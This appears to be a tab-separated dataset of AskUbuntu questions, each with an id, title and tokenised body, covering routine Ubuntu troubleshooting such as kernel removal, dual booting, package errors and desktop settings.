280346	unmet dependencies when i tried to free up unused kernels	i am running 12.04 . i read this http : //askubuntu.com/a/90219/18876 as reference . i checked all the one i have . yeukhon @ fubini : ~ $ aptitude search ~ilinux-image i linux-image-3.2.0-29-generic-pae - linux kernel image for version 3.2.0 on 32 bit i linux-image-3.2.0-31-generic-pae - linux kernel image for version 3.2.0 on 32 bit i linux-image-3.2.0-32-generic-pae - linux kernel image for version 3.2.0 on 32 bit i linux-image-3.2.0-33-generic-pae - linux kernel image for version 3.2.0 on 32 bit i linux-image-3.2.0-34-generic-pae - linux kernel image for version 3.2.0 on 32 bit i linux-image-3.2.0-35-generic-pae - linux kernel image for version 3.2.0 on 32 bit i linux-image-3.2.0-36-generic-pae - linux kernel image for version 3.2.0 on 32 bit i linux-image-3.2.0-37-generic-pae - linux kernel image for version 3.2.0 on 32 bit i linux-image-3.2.0-38-generic-pae - linux kernel image for version 3.2.0 on 32 bit i linux-image-3.2.0-39-generic-pae - linux kernel image for version 3.2.0 on 32 bit bb linux-image-generic-pae - generic linux kernel image i think i am using 39 ? yeukhon @ fubini : ~ $ uname -a linux fubini 3.2.0-39-generic-pae # 62-ubuntu smp wed feb 27 22:25:11 utc 2013 i686 i686 i386 gnu/linux so i started purging as suggested in the reference . sudo apt-get purge linux-image-3.2.0-29 linux-image-3.2.0-30 linux-image-3.2.0-31 linux-image-3.2.0-32 linux-image-3.2.0-33 linux-image-3.2.0-34 linux-image-3.2.0-35 linux-image-3.2.0-36 linux-image-3.2.0-37 linux-image-3.2.0-38 reading package lists ... done building dependency tree reading state information ... done note , selecting 'linux-image-3.2.0-29-generic-pae ' for regex 'linux-image-3.2.0-29' note , selecting 'linux-image-3.2.0-29-powerpc64-smp ' for regex 'linux-image-3.2.0-29' note , selecting 'linux-image-3.2.0-29-virtual ' for regex 'linux-image-3.2.0-29' note , selecting 'linux-image-3.2.0-29-generic ' for regex 'linux-image-3.2.0-29' note , selecting 'linux-image-3.2.0-29-powerpc-smp ' for regex 'linux-image-3.2.0-29' note , selecting 'linux-image-3.2.0-29-highbank ' for regex 'linux-image-3.2.0-29' note , selecting 'linux-image-3.2.0-29-omap ' for regex 'linux-image-3.2.0-29' note , selecting 'linux-image-3.2.0-30-powerpc64-smp ' for regex 'linux-image-3.2.0-30' note , selecting 'linux-image-3.2.0-30-highbank ' for regex 'linux-image-3.2.0-30' note , selecting 'linux-image-3.2.0-30-powerpc-smp ' for regex 'linux-image-3.2.0-30' note , selecting 'linux-image-3.2.0-30-virtual ' for regex 'linux-image-3.2.0-30' note , selecting 'linux-image-3.2.0-30-generic ' for regex 'linux-image-3.2.0-30' note , selecting 'linux-image-3.2.0-30-generic-pae ' for regex 'linux-image-3.2.0-30' note , selecting 'linux-image-3.2.0-30-omap ' for regex 'linux-image-3.2.0-30' note , selecting 'linux-image-3.2.0-31-generic ' for regex 'linux-image-3.2.0-31' note , selecting 'linux-image-3.2.0-31-generic-pae ' for regex 'linux-image-3.2.0-31' note , selecting 'linux-image-3.2.0-31-highbank ' for regex 'linux-image-3.2.0-31' note , selecting 'linux-image-3.2.0-31-omap ' for regex 'linux-image-3.2.0-31' note , selecting 'linux-image-3.2.0-31-powerpc64-smp ' for regex 'linux-image-3.2.0-31' note , selecting 'linux-image-3.2.0-31-powerpc-smp ' for regex 'linux-image-3.2.0-31' note , selecting 'linux-image-3.2.0-31-virtual ' for regex 'linux-image-3.2.0-31' note , selecting 'linux-image-3.2.0-32-powerpc-smp ' for regex 'linux-image-3.2.0-32' note , selecting 'linux-image-3.2.0-32-highbank ' for regex 'linux-image-3.2.0-32' note , selecting 'linux-image-3.2.0-32-virtual ' for regex 'linux-image-3.2.0-32' note , selecting 'linux-image-3.2.0-32-generic-pae ' for regex 'linux-image-3.2.0-32' note , selecting 'linux-image-3.2.0-32-generic ' for regex 'linux-image-3.2.0-32' note , selecting 'linux-image-3.2.0-32-powerpc64-smp ' for regex 'linux-image-3.2.0-32' note , selecting 'linux-image-3.2.0-32-omap ' for regex 'linux-image-3.2.0-32' note , selecting 'linux-image-3.2.0-33-powerpc64-smp ' for regex 'linux-image-3.2.0-33' note , selecting 'linux-image-3.2.0-33-powerpc-smp ' for regex 'linux-image-3.2.0-33' note , selecting 'linux-image-3.2.0-33-omap ' for regex 'linux-image-3.2.0-33' note , selecting 'linux-image-3.2.0-33-virtual ' for regex 'linux-image-3.2.0-33' note , selecting 'linux-image-3.2.0-33-generic-pae ' for regex 'linux-image-3.2.0-33' note , selecting 'linux-image-3.2.0-33-lowlatency-pae ' for regex 'linux-image-3.2.0-33' note , selecting 'linux-image-3.2.0-33-generic ' for regex 'linux-image-3.2.0-33' note , selecting 'linux-image-3.2.0-33-lowlatency ' for regex 'linux-image-3.2.0-33' note , selecting 'linux-image-3.2.0-33-highbank ' for regex 'linux-image-3.2.0-33' note , selecting 'linux-image-3.2.0-34-generic-pae ' for regex 'linux-image-3.2.0-34' note , selecting 'linux-image-3.2.0-34-powerpc64-smp ' for regex 'linux-image-3.2.0-34' note , selecting 'linux-image-3.2.0-34-virtual ' for regex 'linux-image-3.2.0-34' note , selecting 'linux-image-3.2.0-34-generic ' for regex 'linux-image-3.2.0-34' note , selecting 'linux-image-3.2.0-34-powerpc-smp ' for regex 'linux-image-3.2.0-34' note , selecting 'linux-image-3.2.0-34-highbank ' for regex 'linux-image-3.2.0-34' note , selecting 'linux-image-3.2.0-34-omap ' for regex 'linux-image-3.2.0-34' note , selecting 'linux-image-3.2.0-35-powerpc-smp ' for regex 'linux-image-3.2.0-35' note , selecting 'linux-image-3.2.0-35-generic-pae ' for regex 'linux-image-3.2.0-35' note , selecting 'linux-image-3.2.0-35-omap ' for regex 'linux-image-3.2.0-35' note , selecting 'linux-image-3.2.0-35-virtual ' for regex 'linux-image-3.2.0-35' note , selecting 'linux-image-3.2.0-35-powerpc64-smp ' for regex 'linux-image-3.2.0-35' note , selecting 'linux-image-3.2.0-35-generic ' for regex 'linux-image-3.2.0-35' note , selecting 'linux-image-3.2.0-35-lowlatency-pae ' for regex 'linux-image-3.2.0-35' note , selecting 'linux-image-3.2.0-35-lowlatency ' for regex 'linux-image-3.2.0-35' note , selecting 'linux-image-3.2.0-35-highbank ' for regex 'linux-image-3.2.0-35' note , selecting 'linux-image-3.2.0-36-powerpc-smp ' for regex 'linux-image-3.2.0-36' note , selecting 'linux-image-3.2.0-36-lowlatency ' for regex 'linux-image-3.2.0-36' note , selecting 'linux-image-3.2.0-36-highbank ' for regex 'linux-image-3.2.0-36' note , selecting 'linux-image-3.2.0-36-powerpc64-smp ' for regex 'linux-image-3.2.0-36' note , selecting 'linux-image-3.2.0-36-generic-pae ' for regex 'linux-image-3.2.0-36' note , selecting 'linux-image-3.2.0-36-virtual ' for regex 'linux-image-3.2.0-36' note , selecting 'linux-image-3.2.0-36-lowlatency-pae ' for regex 'linux-image-3.2.0-36' note , selecting 'linux-image-3.2.0-36-omap ' for regex 'linux-image-3.2.0-36' note , selecting 'linux-image-3.2.0-36-generic ' for regex 'linux-image-3.2.0-36' note , selecting 'linux-image-3.2.0-37-virtual ' for regex 'linux-image-3.2.0-37' note , selecting 'linux-image-3.2.0-37-generic ' for regex 'linux-image-3.2.0-37' note , selecting 'linux-image-3.2.0-37-lowlatency ' for regex 'linux-image-3.2.0-37' note , selecting 'linux-image-3.2.0-37-highbank ' for regex 'linux-image-3.2.0-37' note , selecting 'linux-image-3.2.0-37-omap ' for regex 'linux-image-3.2.0-37' note , selecting 'linux-image-3.2.0-37-powerpc64-smp ' for regex 'linux-image-3.2.0-37' note , selecting 'linux-image-3.2.0-37-powerpc-smp ' for regex 'linux-image-3.2.0-37' note , selecting 'linux-image-3.2.0-37-lowlatency-pae ' for regex 'linux-image-3.2.0-37' note , selecting 'linux-image-3.2.0-37-generic-pae ' for regex 'linux-image-3.2.0-37' note , selecting 'linux-image-3.2.0-38-highbank ' for regex 'linux-image-3.2.0-38' note , selecting 'linux-image-3.2.0-38-lowlatency ' for regex 'linux-image-3.2.0-38' note , selecting 'linux-image-3.2.0-38-generic-pae ' for regex 'linux-image-3.2.0-38' note , selecting 'linux-image-3.2.0-38-virtual ' for regex 'linux-image-3.2.0-38' note , selecting 'linux-image-3.2.0-38-generic ' for regex 'linux-image-3.2.0-38' note , selecting 'linux-image-3.2.0-38-lowlatency-pae ' for regex 'linux-image-3.2.0-38' note , selecting 'linux-image-3.2.0-38-omap ' for regex 'linux-image-3.2.0-38' note , selecting 'linux-image-3.2.0-38-powerpc64-smp ' for regex 'linux-image-3.2.0-38' note , selecting 'linux-image-3.2.0-38-powerpc-smp ' for regex 'linux-image-3.2.0-38' package linux-image-3.2.0-29-generic is not installed , so not removed package linux-image-3.2.0-29-virtual is not installed , so not removed package linux-image-3.2.0-30-generic is not installed , so not removed package linux-image-3.2.0-30-generic-pae is not installed , so not removed package linux-image-3.2.0-30-virtual is not installed , so not removed package linux-image-3.2.0-31-generic is not installed , so not removed package linux-image-3.2.0-31-virtual is not installed , so not removed package linux-image-3.2.0-32-generic is not installed , so not removed package linux-image-3.2.0-32-virtual is not installed , so not removed package linux-image-3.2.0-33-generic is not installed , so not removed package linux-image-3.2.0-33-virtual is not installed , so not removed package linux-image-3.2.0-34-generic is not installed , so not removed package linux-image-3.2.0-34-virtual is not installed , so not removed package linux-image-3.2.0-35-generic is not installed , so not removed package linux-image-3.2.0-35-virtual is not installed , so not removed package linux-image-3.2.0-36-generic is not installed , so not removed package linux-image-3.2.0-36-virtual is not installed , so not removed package linux-image-3.2.0-37-generic is not installed , so not removed package linux-image-3.2.0-37-virtual is not installed , so not removed package linux-image-3.2.0-38-generic is not installed , so not removed package linux-image-3.2.0-38-virtual is not installed , so not removed package linux-image-3.2.0-33-lowlatency is not installed , so not removed package linux-image-3.2.0-33-lowlatency-pae is not installed , so not removed package linux-image-3.2.0-35-lowlatency is not installed , so not removed package linux-image-3.2.0-35-lowlatency-pae is not installed , so not removed package linux-image-3.2.0-36-lowlatency is not installed , so not removed package linux-image-3.2.0-36-lowlatency-pae is not installed , so not removed package linux-image-3.2.0-37-lowlatency is not installed , so not removed package linux-image-3.2.0-37-lowlatency-pae is not installed , so not removed package linux-image-3.2.0-38-lowlatency is not installed , so not removed package linux-image-3.2.0-38-lowlatency-pae is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-image-generic-pae : depends : linux-image-3.2.0-40-generic-pae but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . now i do n't know how to proceed , especially i do n't want to mess up the computer . ideas ? thanks . solution i found my /boot partition hit 100 % and now i ca n't upgrade . ca n't remove old kernels to make room later . basically , i followed his advise by [ removing ] old vmlinuz initrd , abi and system.map files individually until i got enough free space . i only need to delete the first two . then i do sudo apt-get install -f and finally use @ salem 's little bash script to remove most of the old kernels . i kept the last two as suggested . reboot at the end , and then if i do uname -a i will see the new kernel is now installed ( in my case , that 's 40 ) .
280347	how to recovery the deleted files	i have a java project ( oauth , this is its name ) , and i worked on ubuntu 12.10 and i delete it from eclipse ( delete it from disk ... ) this is a important project for me . can anybody else tell me how can i recovery my java project .
280349	eclipse and the g++ - how is it work	i am using ubuntu 12.04 . i have eclipse juno . i wrote test.cpp : # include < iostream > using namespace std ; int main ( ) { cout < < `` ! ! ! hello world ! ! ! '' < < endl ; // prints ! ! ! hello world ! ! ! return 0 ; } i enter to the terminal and i succeeded to run it . the same file in eclipse i was also able to run but eclipse always warn about errors regarding the lines ( red errors ) . why is it happening ? how can i fix it ? why is it tells me : cout can not be resolved
280353	is it worth uninstalling the gui to lower the attack surface of my ubuntu server ?	i note that there are similar questions on how to remove the gui from an ubuntu install , so i know the technique , i 'm just wondering is it worth doing ? to explain , i have a ubuntu server hosting openvpn which is up and running smoothly . i do n't need the gui and know that a server which does n't have the gui has a smaller attack surface and a reduced need for updating , as there are less components running , so is it a wise move to uninstall the gui ?
280354	qt creator wo n't find `` qmake ''	i installed the qt creator 5.0 to develop apps for ubuntu for phones from here : http : //developer.ubuntu.com/get-started/gomobile/ # step-get-toolkit but i ca n't run any programs and in tools - > options - > build & run the file /usr/bin/qmake ca n't be found . any ideas what i did wrong or how i can install qmake anyways ? btw i am using a hp 550 with ubuntu 12.04 . thanks for any answers !
280355	how do i use doxygen to generate the internal documentation for unity ?	the hacking file for unity says : internal documentation can be built for unity by having doxygen installed and running make doxygen . i 'm not familiar with doxygen and could use some help in the specific command ( s ) to use . i downloaded the unity source using : bzr branch lp : unity and ran doxygen doxyfile.in . it generated api-doc/html with a number of files , but index.html loads an empty framework . i read the man file and the online manual/faq but am still not sure what i need to do .
280358	keep gnome fallback , drop everything else	i 've been on 13.04 since alpha and have gotten really used to gnome fallback with compiz again ( it was n't as well evolved when i switched to gnome shell in the first place ) . i have set this up the way i like and am now afraid of the next or second next update dropping beloved fallback mode . moving forward , what are my best options in your eyes ? never update gnome from now on ? set up mate , make friends with slower gnome 3 classic look or the cinnamon equivalent , tweak xfce to suit my expectations ? can i somehow keep gnome fallback as an autonomous desktop and get rid of gnome 3 shell and cinnamon ( without dropping nemo preferably ) ? thanks for your suggestions !
280362	multiboot win 7 , ubuntu + linux on uefi system	i am quite happy and content today . yesterday i was able to install ubuntu 12.10 on my vaio-s windows 7 machine from 2012 with uefi and secure-boot . i 've failed several times , but using the secure-remix iso it worked . then i used boot-repair , which fixed the efi in a series of automated steps . very nice ! ! but now i wonder if it is possible to install other linux distros alongside ubuntu . i want to review them for a blog i have , that 's why . and i believe i read somewhere that gpt disks can have up to 128 primary partitions ! so my question is : how do i best do this ? can i just go ahead and install 2 or 3 other distros and then re-run boot repair and have it fix the efi ? or is there an other way to do it ? right now i would like to have a look at fedora and zorin , but while i will be using ubuntu for work , i will be swapping other distros in and out , so that is a concern here . i hope somebody can tell me how to go about this smartly ! !
280366	will running ubuntu from usb on a windows 8 pc damage windows ?	i have a laptop with windows 8 64bit pre-installed . i made a bootable usb stick of ubuntu 12.10 64bit using pendrivelinux with persistence . is it safe for me to run it on my windows 8 pc without damaging it ? i would do it without hesitation on any other machine but having heard strange things about the bios and uefi . i thought i should ask someone who has tried it before i break my pc or get sued by microsoft or whatever .
280367	disable the autohide feature in the ubuntu menubar	is there any way to prevent the menu items in the global menu bar from hiding until mouseover ? i really like the idea of the menubar , but it really gets me that the items disappear . is there a way to make them permanently visible , like with the os x menubar ?
280371	ubuntu 12.10 installation error on dell studio 1558	i have a dell studio-1558 which i 've been trying to dual boot . i messed up with the creation of partitions and have lost the ability to boot into windows 7 . now i 'm trying to install ubuntu 12.10 on it through a bootable usb device . i 've created an ext4 partition of around 10gb and commenced the installation process . however , it 's been stuck at the last step : 'saving installed packages ' since the last two hours . also , when i click on details , it tells me that 'no server suitable for synchronization found ' . now i do n't know whether i should cancel the installation midway as it has already messed up my system once .
280372	make a linux install cd on a mac but use it to install linux on a windows machine	i 've tried a couple of times to install linux on my windows machine using a cd created with mac os x ... have not been sucessful . any idea why ? perhaps i 'm downloading the wrong version of linux ? s
280392	disk partition in ubuntu	i have installed ubuntu 12.04 to my whole 1tb system due to lack of disk partition time.now how can i make disk partition in ubuntu for 1tb hard disk and install windows .
280393	system image to be loaded to qemu	is there any way to take a snapshot of my current system and load it on another computer to qemu ?
280396	what is the difference between these two methods of upgrading ubuntu	we could upgrade by installing a new system using 'ubuntu12.10.iso ' . also we can upgrade from an older version of ubuntu , say 'ubuntu12.04 ' . but what is the difference between these two methods ?
280397	12.10 black screen on boot after unplugging external monitor	here is my story : 1 . i plugged an external vga monitor to my laptor ( dell vostro 3550 ) and configured dual display using system settings/displays . everything worked well 2 . i unplugged the external monitor , switched off my laptop and left my office 3 . being at home , when i turn on my laptop i get a blank screen on my lcd display . ctrl+alt+f1 ... f7 does n't work . i assume that my primary display is still set to the external monitor , but i do n't have any external monitor at home . how can i switch back to lcd ?
280398	blinking dashes on top of unity	there are a bunch of dashes like this at the top of the screen . i 'm not sure how to even begin identifying what is causing this . here are some of the things that i 've noticed . i ca n't use ctrl+alt+f1 the top half of the screen just flashes and nothing happens . tell me what you need to diagnose this issue . ati radeon hd 5670 , most recent catalyst driver installed .
280403	setting welcome sound in ubuntu 12.10	can anyone help me to set a welcome sound in my laptop when operating system starts and ready to operate .
280409	how to correctly configure nvidia gt-520mx on ubuntu 12.04 ?	i 'm trying to be able ubuntu graphical effects and unity 3d with the video card in the title on my samsung np300e5a . they seem to run fine with a live cd or usb but they do n't on a fresh install . i initially did n't know that the video card actually was a double one ( integrated intel+dedicated nvidia ) with optimus technology , and bumblebee was the official tool to make it work , so i installed the official sh script downloaded from the nvidia website . it did n't work , so i uninstalled it . i tried to install bumblebee , but the result was a unbootable system . the only way to start it ( without the graphics ) is to run recovery mode and resume normal boot . when i try to run startx i get the error `` fatal server error : no screens found '' . is there a way to to make my video card work properly on my ubuntu 12.04.2 ( with graphical effects and 3d acceleration when needed ) ? i searched thoroughly the web and seems that other people with my same hardware can make it work , but for some reason , i ca n't ... if further infos or details about my system configuration or done operations are needed , i 'm up to complete the description .
280419	why internet disconnects after some time in ubuntu 12.04 ?	i 'm using ubuntu 12.04 precise pangolin . i have an ethernet cable broadband and i have created a dsl connection . when internet is not in use , it is automatically disconnected after some time . and it can not be connected again until i reboot . if the internet is in use , it works flawlessly .
280421	ubuntu inside virtual machine : ntpd or ntpdate or ? ? ? to avoid clock drift	problem : ntpd , when installed on a virtual machine running ubuntu ( i 've had this on hosts with a variety of hypervisors such as kvm and vmware esx ) seem to be prone to severe clock drift . i have n't found any good method and not everyone seems to experience this . question : how can i prevent this ? are there any settings in /etc/ntp.conf to force ntpd to be more aggressive in synchronizing the time inside the vm or should i use ntpdate -b timeserver instead inside a cron job running every so often ? which method is recommended to avoid leaps when using ntpdate -b or clock drift in general inside a ubuntu virtual machine ? side-note : i 've seen similar effects on vios ( ibm hypervisor ) slaves running aix as well as on solaris . so the problem is very real and appears to be related to hypervisors in general .
280422	13.04 - fn volume keys not working on dell inspiron 1470	i 'm using a dell inspiron 1470 , and eversince i updated to 13.04 , none of the fn keys are working , except for brightness and wifi .
280431	how can i stop nautilus from dereferencing symlinks ?	i use symbolic links to tidy my home folder . this works well in the terminal , since the links create the illusion of normal folders : in nautilus , however , the links behave more like windows shortcuts , immediately teleporting me to their target : this is particularly troubling whenยน i later want to navigate `` up '' to the parent folder , as it strands me somewhere outside of the tree i 've carefully tidied . how can i make nautilus show symbolic links as normal folders , like the terminal does ? details nautilus did not dereference symlinks in ubuntu 12.10 : maybe this new behavior is just a bug ? i 'm not sure how to tell . here 's what i know : it 's not on the nautilus 3.6 roadmap . i 've skimmed the recently closed nautilus bugs and did n't see anything related . the nautilus mailing list archive does n't mention the topic . i received no response from about 120 idlers when posing the question on the gnome irc channel . a change was made in nautilus 3.6 to resolve symbolic links before launching applications . ยน this is an example . a workaround for this particular scenario does not constitute an answer to my question . since people seem to be interested in discussing it , though : using the back button is not a suitable workaround ; it does not always take me to the parent folder . you can navigate up by pressing alt+up . the desired behavior in this example is for `` up '' to navigate to the parent folder of the symbolic link . the current behavior is to navigate to the parent folder of the target of the symbolic link .
280433	mirror files and documents from windows machine to ubuntu in virtualbox	ok , so i have a machine with a dual boot installed ( windows 8 and ubuntu 12.10 ) . they are on separate hard drives . i already have virtualbox set up to boot from the linux physical hard drive ( windows 8 host ) . i also have shared my windows user folder using the virtualbox folder share . here is my problem : i would love to be able to just go to the documents folder to access my windows folder documents . i think there is a way to do this with symlinks ... but sometimes i do need to boot just into ubuntu ( not in virtualbox ) and it messes up the symlinks ( because the windows documents are now not accessible via the virtualbox folder but through the actual hard drive ) . any ideas ? thanks in advance !
280435	how can i open a folder in a new window ?	it appears that nautilus no longer provides an open in new window option in its right-click context menus : what procedure should i now use instead when i want to open a folder in a new window ?
280439	gthumb 3 for ubuntu 10.04	i have ubuntu 10.04 installed and i do n't want to upgrade , but i do want to enjoy new features of gthumb 3 , like ability to import from folders etc . after some googling , i found that 2.13.1 is the last gthumb version for lucid due to dependencies to gtk+ 2.24 . is there any way to make it working without upgrade ? patches ? hacks ? even version 2.13.90 is enough ... thanks in advance , alexander noshe
280440	how to get xfce4-sensors plugin to show hdd temperature in xfce panel ?	i am running xubuntu 12.10 in my laptop and i would like to monitor the cpu and hdd temperatures . i have installed lm-sensors , hddtemp and xfce4-sensors-plugin and added the widget into the xfce panel . now , when i login or manually run xfce4-sensors in terminal , i get the following notification : '' hddtemp '' was not executed correctly , although it is executable . this is most probably due to the disks requiring root privileges to read their temperatures , and `` hddtemp '' not being setuid root . an easy but dirty solution is to run `` chmod u+s /usr/sbin/hddtemp '' as root user and restart this plugin or its panel . calling `` /usr/sbin/hddtemp -n -q /dev/sda '' gave the following error : /dev/sda : permission denied with a return value of 256 . when this happens i do not have any option to show the hdd temperature on the panel . however , if i run gksudo xfce4-sensors and enter the password i get no error and can show the hdd temperature on the pannel if i want to . since root permissions are needed in order to run hddtemp and chmod u+s /usr/sbin/hddtemp is not recommended , what alternative do i have to run hddtemp from xfce4-sensors plugin automatically at login ?
280443	output not redirecting to file	i 'm experiencing weirdness ( or rather showing linux ignorance ) . i want to learn the probability distribution of ping requests , so i thought i 'd ping some random site for a while , grep the output to save the ms only , and then redirect to a file . i do this . ping www.doggiedooley.com | grep -o `` [ [ : digit : ] ] * . [ [ : digit : ] ] * ms '' > ping.txt i had high hopes for this command , but even though the file is created , it contains nothing , even after a while . if i remove the redirection , output is shown . i can even redirect the output successfully to another terminal . ping www.doggiedooley.com | grep -o `` [ [ : digit : ] ] * . [ [ : digit : ] ] * ms '' > /dev/pts/1 why is the first command not working properly ?
280449	dual booting ubuntu with windows 7 on a single hdd with common slaves ?	i have a question ... when using multiple partitions for shared access , do you use '/media/ ' as the mount point , or is there a different way to set this stuff up ? i 'm setting up a multimedia system that dual boots ubuntu and win7 off of a single 1tb drive , and has a 1tb as a slave for music , games and pics , along with a 2tb slave for movies and shows . the only thing i really know about mount points for shared partitions is that my windows partition mount point is '/media/os ' and that the partition label is 'os ' . aside from that , i 've never tried to set up slaves under ubuntu . i 've done it under windows , but , i know that 's another animal entirely .
280454	ext2 root partition , incorrect mount time	i 've been bugged by my laptop going into a disk check at every powerup , and i think i have figured out why . my root partition is ext2 ( i chose it when i set the laptop up , and i have n't wanted to risk updating it to ext3 ) . when i run 'dumpe2fs ' , it shows the last mount time was over a month ago ( which i think may be triggering the disk check ) , whereas , strangely the last write time was today . i 've already run the disk check tool - > smart data and tests - > self tests , and that does n't bring up anything bad . why could my mount time be wrong , and how do i fix it ? thanks
280459	pygi how to toggle button without running function	i 'm writing this application using quickly . i 'm looking for a way to toggle button without running function which is connected to this button . def on_button_text_italic_toggled ( self , widget ) : print `` italic '' def on_buttone_test_clicked ( self , widget ) : self.button_text_italic.set_active ( true ) so i need this to make button_text_italic to be toggled but without printing out `` italic '' text . thanks for any help !
280462	errors when running apt-get update ?	w : failed to fetch http : //dl.google.com/linux/deb/dists/raring/release.gpg something wicked happened resolving 'dl.google.com : http ' ( -11 - system error ) w : failed to fetch http : //packages.medibuntu.org/dists/raring/release.gpg something wicked happened resolving 'packages.medibuntu.org : http ' ( -11 - system error ) w : failed to fetch http : //repository.spotify.com/dists/raring/non-free/binary-amd64/packages 404 not found w : failed to fetch http : //repository.spotify.com/dists/raring/non-free/binary-i386/packages 404 not found w : failed to fetch http : //dl.google.com/linux/deb/dists/raring/non-free/binary-amd64/packages 404 not found [ ip : 173.194.46.69 80 ] w : failed to fetch http : //dl.google.com/linux/deb/dists/raring/main/binary-amd64/packages 404 not found [ ip : 173.194.46.69 80 ] w : failed to fetch http : //dl.google.com/linux/deb/dists/raring/non-free/binary-i386/packages 404 not found [ ip : 173.194.46.69 80 ] w : failed to fetch http : //dl.google.com/linux/deb/dists/raring/main/binary-i386/packages 404 not found [ ip : 173.194.46.69 80 ] w : failed to fetch http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu/dists/raring/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/amith/ubuntutools/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/amith/ubuntutools/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old` how can i fix this ? it happens every time i run sudo apt-get update ?
280467	can not lock /var/lib/dpkg/	semary @ semary-pc : ~ $ sudo apt-get install linux-headers-generic e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? how do i fix this ?
280470	does the update manager handle updates for third party applications ?	i have quite a few third party apps , and i was wondering if as long as my computer sees the repository , will it update from update manager ? thanks !
280475	how can instantaneously extract text from a screen area using ocr tools ?	in ubuntu 12.10 , if i type gnome-screenshot -a | tesseract output it returns : ** message : unable to use gnome shell 's builtin screenshot interface , resorting to fallback x11 . how can i select a text from the screen and convert it to text ( clipboard or document ) ? thank you !
280482	how can i load gui applications under an su session ?	when i log into gnome in ubuntu 12.04 , i can type the following on the command line to open a pdf : evince mypdf.pdf however , the following does not work . su evince mypdf.pdf that gives the following error : ( evince:1368 ) : eggsmclient-warning ** : failed to connect to the session manager : none of the authentication protocols specified are supported ** ( evince:1368 ) : warning ** : the connection is closed no protocol specified no protocol specified can not parse arguments : can not open display : how can i fix it so that changing users on the command line does not break gui applications ?
280487	uninstall wps office for linux ?	i have installed wps office from the omg ubuntu website but my problem was it had to many crashes and is in chinese . in the software center , all it says is reinstall , not remove . is there any way i can remove it ?
280490	fail to mount on boot	i have just created a ubuntu server and all is working well however at boot i receive the following error message which is causing problems . i am running ubuntu server 12.04 here is the error any solution appreciated : fsck from until-linux 2.20.1 mount : unkown filesystem type 'nosuid' mountall : mount /dev/shm [ 284 ] terminated with status 32 mountall : filesystem could not be mounted : /dev/shm /dev/sda1 : clean , 118954/24305664 files , 2148531/97219328 blocks an error occurred while mounting /dev/shm press s to skip mounting or m for manual recovery edit : when you click m for manual recovery it appears the error is thrown here [ 15.216401 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro [ 16.014380 ] agpgart-ati 0000:00:00.0 : unsupported ati chipset [ 1002/5a331 ] filesystem check or mount failed /etc/fstab/ # < file system > < mount point > < type > < options > < dump > < pass > # proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdal during installation uuid=1ee5176b-957842d1-955f-de689a5baeb8 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation udid=f5154c5b-6937-4fcc-8984-6129e74c35e9 none swap sw 0 0 tmpfs /dev/shm defaults , boexec , nosuid 0 0 its a real mess all system generated never been in here !
280492	how to write a `` @ '' with a french canadian keyboard	i try to do a `` @ '' but each times a press on alt+2 or ctrl+alt+2 to get it , the top menu of the app/windows show off ( file/edit/view/tool ... ) if a try with a english canadian 's layout or a english usa , i got the same problem . on lubuntu or xubuntu 12.10 , i do n't get this problem . that really seem to come from unity 's shortcut . i am using ubuntu 12.10 .
280497	quicksynergy auto-start on ubuntu 12.10	i 'm pretty new to the ubuntu world , i 've used it as at a workplace before but never personally on my home computer , but i felt it was time for a change . i run windows 8 on my laptop and ubuntu 12.10 along-side my windows 8 on my desktop using synergy on windows i use my mouse and keyboard from my laptop ( as the server ) on my ubuntu desktop ( as a client ) . the only problem i am encountering is having the script auto-start . i either need an option to have it started before login or after , but preferably before . again note that i am a very new user to ubuntu and do not know much besides > sudo apt-get ( haha ) . i 'm hoping somebody in the ubuntu family would become me by helping me out with this problem . thanks , brandin arsenault founding president operation unfriend bullying
280501	connecting qml with c instead of c++ ?	i 've been working on an app in ubuntu , using c and gtk , i want to switch from gtk to qml , however i can not find anywhere on the internet info on linking qml to c functions , just c++ . is it even possible ? and if so , how do i do it ? i already know you can use javascript and c++ , but i 'm looking for c. my favourite languages are c and python and i 'd really like to stick with them .
280503	how to install ubuntu in a toshiba a a-45 satellite laptop ?	i have tried several time to install ubuntu in my toshiba laptop model a45 . i have not been able to do it , my toshiba laptop does not recognize the ubuntu cd to boot from it and it will not boot from my usb stick . i only be able to installed ubuntu with windows help but it does not work same way has in my other comp . does any one has any idea of what can i do to properly install ubuntu in my satellite toshiba a45 ?
280505	usb flash drive boots just fine but grub.cfg file is missing	i have backbox ubuntu installed on a usb flash drive and it boots and runs just fine . however i would like to modify the boot menu but ca n't find a grub.cfg file . therefore grub-update will not work . i 've also tried using grub customizer but it shows both device.map and grub.cfg missing . most posts i 've found with grub.cfg missing have boot problems which i am not having . is my setup not really using grub but an alternative boot system ? any help to reconfigure the boot menu on this system would be appreciated .
280506	how to download apps and install them on another machine	i would like to install a program on another ubuntu machine that does not have internet access . is there a place that i can download debian files , or can i copy some files out of my file system or what . i ca n't figure anything out ! thanks
280507	are 64 bit releases for 12.04 or 12.10 ?	where do i obtain 64 bit 12.04 & 12.10 ? my computer is 64 bit .
280513	authentication required to install plug-ins and application	i can not install new plug in to my linux computer . it keeps asking authentication required that needs a password . i do not know what the password is . pls help me identify the problem or remove the restrictions so that i could install any application freely and easily .
280514	toshiba satellite ubuntu wants to use entire disk	trying to install ubuntu on a new toshiba satellite pro c850 . when trying to install 12.04.2 but it wants to over write the entire disk . . . ditching windows 8 completely . is the only way to dual boot is to use gparted to resize the disk ? i do n't feel i am experienced enough to try that . is there an easy way to install ubuntu on this machine without overwriting windows 8 ? oh i have had no problems installing ubuntu on other machines .
280515	install ubuntu 12.04 system requirements	my computer 's information : processor intel pentium 4 3.00ghz ( 2cpu ) 2046mb ram can i install ubuntu 12.04 ? or will it be slow ?
